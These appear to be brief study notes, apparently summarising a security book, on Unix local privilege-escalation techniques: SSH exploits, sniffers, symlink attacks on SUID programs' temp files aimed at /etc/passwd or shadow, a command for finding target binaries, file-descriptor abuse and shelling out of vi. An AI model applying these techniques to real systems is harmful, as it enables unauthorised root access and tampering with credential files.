SSH Insecurity refer to http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=SSH+exploits&type=archives
Promiscuous Mode Attacks are common in Ethereal, tcpdump, and several other sniffers.
Symbolic Link can be exploited using any program, especially SUID ones, that creates a temp file and doesn't perform any sanity checking. By linking that tmp file to the /etc/passwd or shadow file, the program will update it with its permissions and not root's.
$ strings * | grep tmp (when run in /bin or /usr/bin, will list out good programs to target)
File Descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames (0, 1, 2 = stdin, stdout, stderr). If a file descriptor is opened r/w by a privileged process, it may be possible for the attacker to write to the file while it is being modified. To shell out of vi, execute :!sh and then modify the tmp file or run exploit code.
Reference:
https://cyberguardians.blogspot.com/2006/03/hacking-exposed-notes.html